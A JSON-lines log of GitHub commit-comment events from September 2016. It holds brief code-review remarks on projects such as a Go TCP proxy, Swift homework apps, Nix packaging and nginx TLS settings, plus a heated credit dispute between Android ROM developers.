{"id":"4546513253","type":"CommitCommentEvent","actor":{"login":"geeksbaek"},"repo":{"name":"geeksbaek/go-tcp-proxy"},"payload":{"comment":{"id":18978130,"position":64,"line":64,"path":"main.go","commit_id":"5fffcc8fad0a70a44762d8678bbd7732c620c27d","created_at":"2016-09-11T21:01:49Z","updated_at":"2016-09-11T21:01:49Z","body":"ioutil.ReadAll() 함수는 EOF가 들어올 때까지 읽어옴. \r\n그런데 EOF가 들어오지 않아 디폴트로 설정된 ReadDeadline까지 블록되는 것으로 추측됨.\r\n임시로 아래 코드로 데드라인을 줄여주는 방법으로 딜레이를 개선할 수 있음.\r\n```\r\nrconn.SetReadDeadline(time.Now().Add(time.Millisecond * 100))\r\n```"}},"created_at":"2016-09-11T21:01:49Z"}
{"id":"4546513428","type":"CommitCommentEvent","actor":{"login":"Alcaro"},"repo":{"name":"libretro/Genesis-Plus-GX"},"payload":{"comment":{"id":18978131,"position":null,"line":null,"path":null,"commit_id":"64ee605076b4f63e3a3a65316323cc61f210f030","created_at":"2016-09-11T21:01:57Z","updated_at":"2016-09-11T21:01:57Z","body":"That's not gonna work on non-GCC compilers. Do we care about MSVC in this repo, or should this be a define?\r\n\r\n...should probably be a define even if we don't care about MSVC, they're a bit ugly."}},"created_at":"2016-09-11T21:01:57Z"}
{"id":"4546513764","type":"CommitCommentEvent","actor":{"login":"diesieben07"},"repo":{"name":"MinecraftForge/MinecraftForge"},"payload":{"comment":{"id":18978133,"position":13,"line":67,"path":"patches/minecraft/net/minecraft/item/ItemStack.java.patch","commit_id":"5964bf8cb2df50057e00960a6ab33d863c7ae23a","created_at":"2016-09-11T21:02:11Z","updated_at":"2016-09-11T21:02:11Z","body":"Should probably re-use `cnbt` when setting the ForgeCaps tag."}},"created_at":"2016-09-11T21:02:11Z"}
{"id":"4546513937","type":"CommitCommentEvent","actor":{"login":"antjowie"},"repo":{"name":"antjowie/BeginnerExercises"},"payload":{"comment":{"id":18978135,"position":null,"line":null,"path":null,"commit_id":"b9dfee67e9891e4333e307fc8f22812c09d7aa59","created_at":"2016-09-11T21:02:18Z","updated_at":"2016-09-11T21:02:18Z","body":"I messed it all up -_-"}},"created_at":"2016-09-11T21:02:18Z"}
{"id":"4546515367","type":"CommitCommentEvent","actor":{"login":"dinoboff"},"repo":{"name":"shiquan-lim/classmentors"},"payload":{"comment":{"id":18978138,"position":279,"line":1407,"path":"src/classmentors/components/events/events.js","commit_id":"d6632797892a76447cc7a87d58a79608f1ea3602","created_at":"2016-09-11T21:03:03Z","updated_at":"2016-09-11T21:03:03Z","body":"@hiddenmirage why do you redefine the saveTask method while it's being called."}},"created_at":"2016-09-11T21:03:03Z"}
{"id":"4546515805","type":"CommitCommentEvent","actor":{"login":"ToadKing"},"repo":{"name":"libretro/Genesis-Plus-GX"},"payload":{"comment":{"id":18978140,"position":null,"line":null,"path":null,"commit_id":"64ee605076b4f63e3a3a65316323cc61f210f030","created_at":"2016-09-11T21:03:19Z","updated_at":"2016-09-11T21:03:19Z","body":"It works on clang, but I guess it just adopted the same syntax as GCC did.\r\n\r\nImplementing them as defines would work."}},"created_at":"2016-09-11T21:03:19Z"}
{"id":"4546518323","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"merimad/Zadace"},"payload":{"comment":{"id":18978149,"position":55,"line":55,"path":"SpendTrackerApp/SpendTrackerApp/SpendViewController.swift","commit_id":"85f64550a84577e780a09c474bdc410405a9ae2b","created_at":"2016-09-11T21:04:51Z","updated_at":"2016-09-11T21:04:51Z","body":"validMealName?"}},"created_at":"2016-09-11T21:04:51Z"}
{"id":"4546520199","type":"CommitCommentEvent","actor":{"login":"bytn"},"repo":{"name":"Obarun/obarun-boot"},"payload":{"comment":{"id":18978158,"position":null,"line":null,"path":null,"commit_id":"2bf734269fac7326d66f795b8a55f2729f9c5ee0","created_at":"2016-09-11T21:05:57Z","updated_at":"2016-09-11T21:05:57Z","body":"https://www.gnu.org/software/bash/manual/bashref.html#Redirecting-Standard-Output-and-Standard-Error"}},"created_at":"2016-09-11T21:05:57Z"}
{"id":"4546520909","type":"CommitCommentEvent","actor":{"login":"nkk71"},"repo":{"name":"AdrianDC/android_device_sony_dora"},"payload":{"comment":{"id":18978160,"position":6,"line":112,"path":"BoardConfig.mk","commit_id":"ffb98657b2652a875b50688dc4a2c34bc1aa83af","created_at":"2016-09-11T21:06:26Z","updated_at":"2016-09-11T21:06:26Z","body":"get rid of this, it needs to be a symlink for decryption to work... actually HAS to be a symlink\r\n(at least on HTC 10)"}},"created_at":"2016-09-11T21:06:26Z"}
{"id":"4546521657","type":"CommitCommentEvent","actor":{"login":"AraHaan"},"repo":{"name":"jessesuen/pyinstaller"},"payload":{"comment":{"id":18978165,"position":null,"line":null,"path":null,"commit_id":"fce9bf3361ff96c5ae7fe9051cf55366e611d7d3","created_at":"2016-09-11T21:06:55Z","updated_at":"2016-09-11T21:06:55Z","body":"Please Pull Request this I am having issues with this in PyInstaller for running my bot."}},"created_at":"2016-09-11T21:06:55Z"}
{"id":"4546522718","type":"CommitCommentEvent","actor":{"login":"nkk71"},"repo":{"name":"AdrianDC/android_device_sony_dora"},"payload":{"comment":{"id":18978170,"position":129,"line":129,"path":"multirom/mr_hooks.c","commit_id":"ffb98657b2652a875b50688dc4a2c34bc1aa83af","created_at":"2016-09-11T21:07:37Z","updated_at":"2016-09-11T21:07:37Z","body":"don't know if this will work for you, i had to fix the actual code\r\nso i'll push \"new\" devices.c/cpp when it's good"}},"created_at":"2016-09-11T21:07:37Z"}
{"id":"4546523009","type":"CommitCommentEvent","actor":{"login":"unixworld"},"repo":{"name":"unixworld/lfs-server-go"},"payload":{"comment":{"id":18978171,"position":null,"line":null,"path":null,"commit_id":"d7f7b8e8120ef45de324b904df89af23557ef884","created_at":"2016-09-11T21:07:47Z","updated_at":"2016-09-11T21:07:47Z","body":"Add MySQL meta store test."}},"created_at":"2016-09-11T21:07:47Z"}
{"id":"4546523188","type":"CommitCommentEvent","actor":{"login":"hadley"},"repo":{"name":"rstats-db/RSQLite"},"payload":{"comment":{"id":18978172,"position":null,"line":null,"path":null,"commit_id":"1cfbce07c678de3e59eb95506134fde0421080c7","created_at":"2016-09-11T21:07:55Z","updated_at":"2016-09-11T21:07:55Z","body":"LGTM "}},"created_at":"2016-09-11T21:07:55Z"}
{"id":"4546523859","type":"CommitCommentEvent","actor":{"login":"Thrax989"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":18978176,"position":null,"line":null,"path":null,"commit_id":"f8f6d38931b4a1696f0825302d14a2e2afc6c4a7","created_at":"2016-09-11T21:08:22Z","updated_at":"2016-09-11T21:08:22Z","body":"I have not tested these yet how do these refined packs work ? you loot it and put it in your saber?"}},"created_at":"2016-09-11T21:08:22Z"}
{"id":"4546524013","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"merimad/Zadace"},"payload":{"comment":{"id":18978177,"position":86,"line":86,"path":"SpendTrackerApp/SpendTrackerApp/SpendViewController.swift","commit_id":"85f64550a84577e780a09c474bdc410405a9ae2b","created_at":"2016-09-11T21:08:27Z","updated_at":"2016-09-11T21:08:27Z","body":"dogadjati se da ako je description filed prazno da i dalje mozes da snimis"}},"created_at":"2016-09-11T21:08:27Z"}
{"id":"4546524653","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"merimad/Zadace"},"payload":{"comment":{"id":18978182,"position":89,"line":89,"path":"SpendTrackerApp/SpendTrackerApp/SpendViewController.swift","commit_id":"85f64550a84577e780a09c474bdc410405a9ae2b","created_at":"2016-09-11T21:08:50Z","updated_at":"2016-09-11T21:08:50Z","body":"hajd malo guardaj ovo? "}},"created_at":"2016-09-11T21:08:50Z"}
{"id":"4546524753","type":"CommitCommentEvent","actor":{"login":"nkk71"},"repo":{"name":"AdrianDC/android_device_sony_dora"},"payload":{"comment":{"id":18978183,"position":70,"line":70,"path":"multirom/mr_init_devices.c","commit_id":"ffb98657b2652a875b50688dc4a2c34bc1aa83af","created_at":"2016-09-11T21:08:55Z","updated_at":"2016-09-11T21:08:55Z","body":"possibly missing things here"}},"created_at":"2016-09-11T21:08:55Z"}
{"id":"4546525798","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"merimad/Zadace"},"payload":{"comment":{"id":18978185,"position":111,"line":111,"path":"SpendTrackerApp/SpendTrackerApp/SpendTableViewController.swift","commit_id":"85f64550a84577e780a09c474bdc410405a9ae2b","created_at":"2016-09-11T21:09:39Z","updated_at":"2016-09-11T21:09:39Z","body":"netreb ti ovaj segue ovdje"}},"created_at":"2016-09-11T21:09:39Z"}
{"id":"4546526956","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"merimad/Zadace"},"payload":{"comment":{"id":18978188,"position":null,"line":null,"path":null,"commit_id":"85f64550a84577e780a09c474bdc410405a9ae2b","created_at":"2016-09-11T21:10:21Z","updated_at":"2016-09-11T21:10:21Z","body":"ok, nije lose. par nekih malih greskica\r\n"}},"created_at":"2016-09-11T21:10:21Z"}
{"id":"4546529885","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"EnaTopoljak/Zadace"},"payload":{"comment":{"id":18978194,"position":36,"line":36,"path":"SpendTrackerApp/SpendTrackerApp/SpendTrackerTableViewController.swift","commit_id":"c7ed1b493f32943cf86560ac89a54ff2ce1187de","created_at":"2016-09-11T21:12:17Z","updated_at":"2016-09-11T21:12:17Z","body":"nema potrebe za ovim samples. sad kad mozete i pisati i snimati"}},"created_at":"2016-09-11T21:12:17Z"}
{"id":"4546530273","type":"CommitCommentEvent","actor":{"login":"asiffermann"},"repo":{"name":"geeklearningio/gl-vsts-tasks-azure"},"payload":{"comment":{"id":18978196,"position":null,"line":null,"path":null,"commit_id":"3e9b00872a591f8917acee227983bba280d9b958","created_at":"2016-09-11T21:12:32Z","updated_at":"2016-09-11T21:12:32Z","body":"Tests to check issues like #7 "}},"created_at":"2016-09-11T21:12:32Z"}
{"id":"4546530733","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"EnaTopoljak/Zadace"},"payload":{"comment":{"id":18978198,"position":117,"line":117,"path":"SpendTrackerApp/SpendTrackerApp/SpendTrackerTableViewController.swift","commit_id":"c7ed1b493f32943cf86560ac89a54ff2ce1187de","created_at":"2016-09-11T21:12:51Z","updated_at":"2016-09-11T21:12:51Z","body":"oovaj segue nije potreban"}},"created_at":"2016-09-11T21:12:51Z"}
{"id":"4546531029","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"EnaTopoljak/Zadace"},"payload":{"comment":{"id":18978201,"position":140,"line":140,"path":"SpendTrackerApp/SpendTrackerApp/SpendTrackerTableViewController.swift","commit_id":"c7ed1b493f32943cf86560ac89a54ff2ce1187de","created_at":"2016-09-11T21:13:03Z","updated_at":"2016-09-11T21:13:03Z","body":"meals?"}},"created_at":"2016-09-11T21:13:03Z"}
{"id":"4546531792","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"EnaTopoljak/Zadace"},"payload":{"comment":{"id":18978206,"position":41,"line":41,"path":"SpendTrackerApp/SpendTrackerApp/SprendTracker.swift","commit_id":"c7ed1b493f32943cf86560ac89a54ff2ce1187de","created_at":"2016-09-11T21:13:35Z","updated_at":"2016-09-11T21:13:35Z","body":"a sta ako je description ili date empty+*"}},"created_at":"2016-09-11T21:13:35Z"}
{"id":"4546533120","type":"CommitCommentEvent","actor":{"login":"dinoboff"},"repo":{"name":"shiquan-lim/classmentors"},"payload":{"comment":{"id":18978209,"position":279,"line":1407,"path":"src/classmentors/components/events/events.js","commit_id":"d6632797892a76447cc7a87d58a79608f1ea3602","created_at":"2016-09-11T21:14:27Z","updated_at":"2016-09-11T21:14:27Z","body":"@hiddenmirage figured it out"}},"created_at":"2016-09-11T21:14:27Z"}
{"id":"4546533557","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"EnaTopoljak/Zadace"},"payload":{"comment":{"id":18978210,"position":60,"line":60,"path":"SpendTrackerApp/SpendTrackerApp/ViewController.swift","commit_id":"c7ed1b493f32943cf86560ac89a54ff2ce1187de","created_at":"2016-09-11T21:14:45Z","updated_at":"2016-09-11T21:14:45Z","body":"zasto !text!"}},"created_at":"2016-09-11T21:14:45Z"}
{"id":"4546534189","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"EnaTopoljak/Zadace"},"payload":{"comment":{"id":18978214,"position":null,"line":null,"path":null,"commit_id":"c7ed1b493f32943cf86560ac89a54ff2ce1187de","created_at":"2016-09-11T21:15:12Z","updated_at":"2016-09-11T21:15:12Z","body":"ok.. malo ovih mekih stvari za ispraviti"}},"created_at":"2016-09-11T21:15:12Z"}
{"id":"4546542845","type":"CommitCommentEvent","actor":{"login":"YanLiang1102"},"repo":{"name":"oudalab/fajita"},"payload":{"comment":{"id":18978236,"position":6,"line":205,"path":"app/routes.js","commit_id":"f66993d0083679ad27b99028040f55964a5e5471","created_at":"2016-09-11T21:20:56Z","updated_at":"2016-09-11T21:20:56Z","body":"this is how mongoose will take the regex query to mongo, take quite a while to make this work"}},"created_at":"2016-09-11T21:20:56Z"}
{"id":"4546545523","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"vshaxe/vshaxe"},"payload":{"comment":{"id":18978246,"position":12,"line":10,"path":"haxe.configuration.json","commit_id":"10c9a457a2f0b1827730c2a3eeb0a8c0711c0f2e","created_at":"2016-09-11T21:22:29Z","updated_at":"2016-09-11T21:22:29Z","body":"I thought it's automatically respected, isn't it?"}},"created_at":"2016-09-11T21:22:29Z"}
{"id":"4546547385","type":"CommitCommentEvent","actor":{"login":"live627"},"repo":{"name":"emanuele45/Dialogo"},"payload":{"comment":{"id":18978251,"position":null,"line":null,"path":null,"commit_id":"56d9405413f0f93f193cae1360c99b8952f8d819","created_at":"2016-09-11T21:23:42Z","updated_at":"2016-09-11T21:23:42Z","body":"> I hate when you use a function and it changes the value passed to it... it's really always a pain.\r\n\r\n+1"}},"created_at":"2016-09-11T21:23:42Z"}
{"id":"4546547910","type":"CommitCommentEvent","actor":{"login":"mdorman"},"repo":{"name":"NixOS/cabal2nix"},"payload":{"comment":{"id":18978252,"position":null,"line":null,"path":null,"commit_id":"22311078120b9531c9185328fecb130824d1ddc9","created_at":"2016-09-11T21:24:05Z","updated_at":"2016-09-11T21:24:05Z","body":"It's not a silly question, but I am uncertain of the right answer.\r\n\r\nHaving now spent about two hours trying to trace through this in my head, I wonder if at least part of the problem is simply be that the `.gir` files for `glib` and `gobject` aren't in `glib.dev`, but are in the `gobject-introspection` package instead---which breaks the chain between the `pkg-depends` entry in the .cabal file(s) and the parts that are necessary to actually do the build.\r\n\r\nIt further means that, say, `gstreamer`, which *does* propagate its build dependency on `glib`, doesn't end up propagating those `.gir` files for `glib`, which leads to any downstream consumers of `gstreamer`'s `.gir` files to have to declare their own dependency on `gobject-introspection`.\r\n\r\nSo at this moment, I think that is where the problem lies---but all of this is not stuff I'm deeply knowledgeable about---I just looked at the build failures, and did what I had to do to get beyond them."}},"created_at":"2016-09-11T21:24:05Z"}
{"id":"4546548721","type":"CommitCommentEvent","actor":{"login":"NL-BlackDragon"},"repo":{"name":"CyanideL/android_frameworks_base"},"payload":{"comment":{"id":18978255,"position":null,"line":null,"path":null,"commit_id":"24ac51867b6b37546b35710f2146b44883acf60b","created_at":"2016-09-11T21:24:34Z","updated_at":"2016-09-11T21:24:34Z","body":"Funny you made this commit on 15 Nov 2015. As i made the BlackOut theme possible in M! I also added the on light change feature. and i did alot more for the theming stuff in VRToxin Or as You Call it Cyanide. So new source and already kanging!! Not the correct authorship or even no credits for this commit. Yeah the man who said he didnt wanted a separate Settings application lol. You are no better then what the other devs accused me with man.\r\n\r\nhttps://github.com/CyanideL/android_frameworks_base/commit/212249962c94bcd109f6394d338db39e7e15df7e\r\n\r\nhttps://github.com/CyanideL/android_frameworks_base/commit/a509947885af578c6fe3ca4ebbb102a2a94739ea\r\n\r\nhttps://github.com/CyanideL/android_frameworks_base/commit/faf4ee28dccc050f6f6e94677f1b73e091b239e8\r\n\r\nhttps://github.com/CyanideL/android_packages_apps_Settings/commit/cf84d81fa09306a36682eb4b597819f5485a38d7\r\n\r\nhttps://github.com/CyanideL/android_packages_apps_Settings/commit/f49c6561790468fd70b1cfd47bdff884f0105072\r\n\r\nhttps://github.com/CyanideL/android_development/commit/86a2c807f789ac0fb324f9406d078e4d31e76777\r\n\r\nhttps://github.com/CyanideL/android_frameworks_native/commit/10f003565b21a0696efe85bfe8e79c32cb8a0387\r\n\r\nAnd so on.....\r\n\r\nYeah Brett you are the man!!!"}},"created_at":"2016-09-11T21:24:34Z"}
{"id":"4546548989","type":"CommitCommentEvent","actor":{"login":"Dagothur"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18978257,"position":null,"line":null,"path":null,"commit_id":"f8355e9ee516bb338ff14f7ee6c438da6f61ad53","created_at":"2016-09-11T21:24:47Z","updated_at":"2016-09-11T21:24:47Z","body":"> 2016-09-11 06:08:56,274 [    db-updater-0][        models][ WARNING] (2003, \"Can't connect to MySQL server on '107.161.31.131' ([Errno 111] Connection refused)\")... Retrying\r\n> 2016-09-11 06:08:56,397 [    db-updater-0][        models][ WARNING] (2003, \"Can't connect to MySQL server on '107.161.31.131' ([Errno 111] Connection refused)\")... Retrying\r\n> 2016-09-11 06:08:56,540 [    db-updater-0][        models][ WARNING] (2003, \"Can't connect to MySQL server on '107.161.31.131' ([Errno 111] Connection refused)\")... Retrying\r\n> 2016-09-11 06:08:56,664 [    db-updater-0][        models][ WARNING] (2003, \"Can't connect to MySQL server on '107.161.31.131' ([Errno 111] Connection refused)\")... Retrying\r\n> 2016-09-11 06:08:56,799 [    db-updater-0][        models][ WARNING] (2003, \"Can't connect to MySQL server on '107.161.31.131' ([Errno 111] Connection refused)\")... Retrying\r\n> 2016-09-11 06:08:56,941 [    db-updater-0][        models][ WARNING] (2003, \"Can't connect to MySQL server on '107.161.31.131' ([Errno 111] Connection refused)\")... Retrying\r\n> 2016-09-11 06:08:57,074 [    db-updater-0][        models][ WARNING] (2003, \"Can't connect to MySQL server on '107.161.31.131' ([Errno 111] Connection refused)\")... Retrying\r\n> 2016-09-11 06:08:57,194 [    db-updater-0][        models][ WARNING] (2003, \"Can't connect to MySQL server on '107.161.31.131' ([Errno 111] Connection refused)\")... Retrying\r\n\r\nI wont miss this :+1: "}},"created_at":"2016-09-11T21:24:47Z"}
{"id":"4546549302","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"BelminSalkica/WIP-Zadace"},"payload":{"comment":{"id":18978260,"position":133,"line":133,"path":"Xcode-exercise/SpendingTracker/SpendingTracker/ViewController.swift","commit_id":"a5ae8772ccb606d17357f3c86b4f75b8b261c1da","created_at":"2016-09-11T21:25:00Z","updated_at":"2016-09-11T21:25:00Z","body":"da li si mogao ovo gurnuti u neku funkciju da ne ponavljas 3 puta istu stvar npr: styleView(view: UIView?)"}},"created_at":"2016-09-11T21:25:00Z"}
{"id":"4546549815","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"BelminSalkica/WIP-Zadace"},"payload":{"comment":{"id":18978262,"position":152,"line":152,"path":"Xcode-exercise/SpendingTracker/SpendingTracker/ViewController.swift","commit_id":"a5ae8772ccb606d17357f3c86b4f75b8b261c1da","created_at":"2016-09-11T21:25:17Z","updated_at":"2016-09-11T21:25:17Z","body":"obrisi ove prazne linije"}},"created_at":"2016-09-11T21:25:17Z"}
{"id":"4546550258","type":"CommitCommentEvent","actor":{"login":"PeterJCLaw"},"repo":{"name":"srobo/website"},"payload":{"comment":{"id":18978265,"position":15,"line":37,"path":"_env/nginx.conf","commit_id":"6589a6145235fabf055e802416dcc77faab762f7","created_at":"2016-09-11T21:25:32Z","updated_at":"2016-09-11T21:25:32Z","body":"Oddly, https://www.ssllabs.com/ssltest/analyze.html?d=studentrobotics.org doesn't report any change in behaviour which I can see from these lines. Specifically, I have a copy of the report from 19:30 today (before these changes were added) and from after this commit went live (at 21:15. which does show the added HSTS header) and there is no difference in the reported detected TLS/SSL behaviours and support. I'm guessing that this is because these are are now the defaults, which would be good, though it may also indicate that we don't actually have control over this aspect, which might be less good. It would be good to find some docs which indicate one way or the other (or just test it)."}},"created_at":"2016-09-11T21:25:32Z"}
{"id":"4546550960","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"BelminSalkica/WIP-Zadace"},"payload":{"comment":{"id":18978267,"position":117,"line":117,"path":"Xcode-exercise/SpendingTracker/SpendingTracker/ViewController.swift","commit_id":"a5ae8772ccb606d17357f3c86b4f75b8b261c1da","created_at":"2016-09-11T21:26:03Z","updated_at":"2016-09-11T21:26:03Z","body":"jesmo se dogovorili da nema amountSpent! :)"}},"created_at":"2016-09-11T21:26:03Z"}
{"id":"4546553367","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"BelminSalkica/WIP-Zadace"},"payload":{"comment":{"id":18978270,"position":122,"line":122,"path":"Xcode-exercise/SpendingTracker/SpendingTracker/SpendingTableViewController.swift","commit_id":"a5ae8772ccb606d17357f3c86b4f75b8b261c1da","created_at":"2016-09-11T21:27:29Z","updated_at":"2016-09-11T21:27:29Z","body":"if let indexPath..."}},"created_at":"2016-09-11T21:27:29Z"}
{"id":"4546553642","type":"CommitCommentEvent","actor":{"login":"JPeroutek"},"repo":{"name":"pringers/usd.pw"},"payload":{"comment":{"id":18978271,"position":null,"line":null,"path":null,"commit_id":"2b9640be354ec988a3d9038cf9c92e233454a4bb","created_at":"2016-09-11T21:27:39Z","updated_at":"2016-09-11T21:27:39Z","body":"aids.  complete and total aids.\r\n"}},"created_at":"2016-09-11T21:27:39Z"}
{"id":"4546553872","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"BelminSalkica/WIP-Zadace"},"payload":{"comment":{"id":18978272,"position":128,"line":128,"path":"Xcode-exercise/SpendingTracker/SpendingTracker/SpendingTableViewController.swift","commit_id":"a5ae8772ccb606d17357f3c86b4f75b8b261c1da","created_at":"2016-09-11T21:27:48Z","updated_at":"2016-09-11T21:27:48Z","body":"ok, nema potrebe inace za ovim"}},"created_at":"2016-09-11T21:27:48Z"}
{"id":"4546554310","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"BelminSalkica/WIP-Zadace"},"payload":{"comment":{"id":18978273,"position":95,"line":95,"path":"Xcode-exercise/SpendingTracker/SpendingTracker/SpendingTableViewController.swift","commit_id":"a5ae8772ccb606d17357f3c86b4f75b8b261c1da","created_at":"2016-09-11T21:28:04Z","updated_at":"2016-09-11T21:28:04Z","body":"meal?"}},"created_at":"2016-09-11T21:28:04Z"}
{"id":"4546555259","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"BelminSalkica/WIP-Zadace"},"payload":{"comment":{"id":18978275,"position":61,"line":61,"path":"Xcode-exercise/SpendingTracker/SpendingTracker/SpendingTableViewController.swift","commit_id":"a5ae8772ccb606d17357f3c86b4f75b8b261c1da","created_at":"2016-09-11T21:28:35Z","updated_at":"2016-09-11T21:28:35Z","body":"brisi ove komentare"}},"created_at":"2016-09-11T21:28:35Z"}
{"id":"4546555749","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"BelminSalkica/WIP-Zadace"},"payload":{"comment":{"id":18978278,"position":29,"line":29,"path":"Xcode-exercise/SpendingTracker/SpendingTracker/SpendingTableViewController.swift","commit_id":"a5ae8772ccb606d17357f3c86b4f75b8b261c1da","created_at":"2016-09-11T21:28:55Z","updated_at":"2016-09-11T21:28:55Z","body":"nema potrebe za ovim samples"}},"created_at":"2016-09-11T21:28:55Z"}
{"id":"4546556849","type":"CommitCommentEvent","actor":{"login":"jarun"},"repo":{"name":"jarun/Buku"},"payload":{"comment":{"id":18978283,"position":null,"line":null,"path":null,"commit_id":"b90679aab7ae1ae2ee54353c5a1ba89469e5d79a","created_at":"2016-09-11T21:29:42Z","updated_at":"2016-09-11T21:29:42Z","body":":+1: \r\n\r\n@atweiden, I guess you have added me as a co-author for `Buku` on AUR. Can you please add @shaggytwodope as well? He already handles my other utility `googler` on AUR. Probably `googler` wouldn't have a release very soon and I hope @shaggytwodope would be fine with this."}},"created_at":"2016-09-11T21:29:42Z"}
{"id":"4546557530","type":"CommitCommentEvent","actor":{"login":"jeffreydunaway"},"repo":{"name":"githubschool/open-enrollment-classes-introduction-to-github"},"payload":{"comment":{"id":18978285,"position":5,"line":5,"path":"_pins/nitben.json","commit_id":"593416b3aeebf8f266b75bd342c852e53c61dd1d","created_at":"2016-09-11T21:30:06Z","updated_at":"2016-09-11T21:30:06Z","body":"I don't understand what I'm supposed to be doing with this project. Can @githubschool/education-community help? "}},"created_at":"2016-09-11T21:30:06Z"}
{"id":"4546561791","type":"CommitCommentEvent","actor":{"login":"AlexandreMasta"},"repo":{"name":"mbootsector/Stockfish"},"payload":{"comment":{"id":18978299,"position":null,"line":null,"path":null,"commit_id":"afbe6ac597dfb2bb7ce9203e62b7ed637bd7a935","created_at":"2016-09-11T21:32:50Z","updated_at":"2016-09-11T21:32:50Z","body":"Another WOoow patch!! +10 elo ...what is happening?? Haha\r\n\r\nCongrats...GL LTC!!!"}},"created_at":"2016-09-11T21:32:50Z"}
{"id":"4546566396","type":"CommitCommentEvent","actor":{"login":"amlinger"},"repo":{"name":"amlinger/homebridge-telldus-tdtool"},"payload":{"comment":{"id":18978314,"position":null,"line":null,"path":null,"commit_id":"c4ee825be979089a7a9914ae423d2a7d29ad8779","created_at":"2016-09-11T21:36:10Z","updated_at":"2016-09-11T21:36:10Z","body":"A big shoutout and thank you to @kskaret for this, although his attribution somehow disappeared in the squash/merge!"}},"created_at":"2016-09-11T21:36:10Z"}
{"id":"4546568315","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"vshaxe/vshaxe"},"payload":{"comment":{"id":18978317,"position":12,"line":10,"path":"haxe.configuration.json","commit_id":"10c9a457a2f0b1827730c2a3eeb0a8c0711c0f2e","created_at":"2016-09-11T21:37:26Z","updated_at":"2016-09-11T21:37:26Z","body":"Apparently not"}},"created_at":"2016-09-11T21:37:26Z"}
{"id":"4546569546","type":"CommitCommentEvent","actor":{"login":"mbootsector"},"repo":{"name":"mbootsector/Stockfish"},"payload":{"comment":{"id":18978323,"position":null,"line":null,"path":null,"commit_id":"afbe6ac597dfb2bb7ce9203e62b7ed637bd7a935","created_at":"2016-09-11T21:38:16Z","updated_at":"2016-09-11T21:38:16Z","body":"We'll see. 10 elo on my local computer on which I can't turn off turbo. Speed bounces from 2.6 to 2.0 ghz, so I'm a bit sceptical about the result."}},"created_at":"2016-09-11T21:38:16Z"}
{"id":"4546571802","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"BelminSalkica/WIP-Zadace"},"payload":{"comment":{"id":18978329,"position":null,"line":null,"path":null,"commit_id":"a5ae8772ccb606d17357f3c86b4f75b8b261c1da","created_at":"2016-09-11T21:39:56Z","updated_at":"2016-09-11T21:39:56Z","body":"pretpostavljam da stack view u viewdid load slaze views automatski. ja nisam ljubitelj toga :) \r\n\r\n2 fali ti u tableview opis :)"}},"created_at":"2016-09-11T21:39:56Z"}
{"id":"4546572346","type":"CommitCommentEvent","actor":{"login":"shaggytwodope"},"repo":{"name":"jarun/Buku"},"payload":{"comment":{"id":18978332,"position":null,"line":null,"path":null,"commit_id":"b90679aab7ae1ae2ee54353c5a1ba89469e5d79a","created_at":"2016-09-11T21:40:18Z","updated_at":"2016-09-11T21:40:18Z","body":"I'd be happy to help if need be @atweiden and @jarun , shaggytwodope user is my username on AUR as well."}},"created_at":"2016-09-11T21:40:18Z"}
{"id":"4546573449","type":"CommitCommentEvent","actor":{"login":"mikejbrown"},"repo":{"name":"TeamPorcupine/ProjectPorcupine"},"payload":{"comment":{"id":18978334,"position":119,"line":119,"path":"Assets/Scripts/UI/InGameUI/MenuLeft/ConstructionMenu.cs","commit_id":"b86f466931cc677f75dae8330e2670c2fe013ad6","created_at":"2016-09-11T21:41:06Z","updated_at":"2016-09-11T21:41:06Z","body":"What is going on here? I can't compile because of this."}},"created_at":"2016-09-11T21:41:06Z"}
{"id":"4546573839","type":"CommitCommentEvent","actor":{"login":"rogersb11"},"repo":{"name":"CyanideL/android_frameworks_base"},"payload":{"comment":{"id":18978335,"position":null,"line":null,"path":null,"commit_id":"24ac51867b6b37546b35710f2146b44883acf60b","created_at":"2016-09-11T21:41:22Z","updated_at":"2016-09-11T21:41:22Z","body":"Right, you made it possible and used all my resources with your name, kanged my entire expansion view etc. I don't owe you shit here considering all the shit I dealt with over you. Oh I'm sorry, you coded an app for settings from scratch like I did? Yea I didn't think so, my shit is still built using Gradle right now. I knew you'd come out of hiding to whine but never to respond like a man, go back in your hole"}},"created_at":"2016-09-11T21:41:22Z"}
{"id":"4546574035","type":"CommitCommentEvent","actor":{"login":"MDB4"},"repo":{"name":"MDB4/fuelrats-Ratsignal-mIRC"},"payload":{"comment":{"id":18978337,"position":null,"line":null,"path":null,"commit_id":"d5a124e34ad6b86660bbb13a9af1a0b062205750","created_at":"2016-09-11T21:41:30Z","updated_at":"2016-09-11T21:41:30Z","body":"Also added notification of MechaSqueak[BOT]'s presence, or lack thereof."}},"created_at":"2016-09-11T21:41:30Z"}
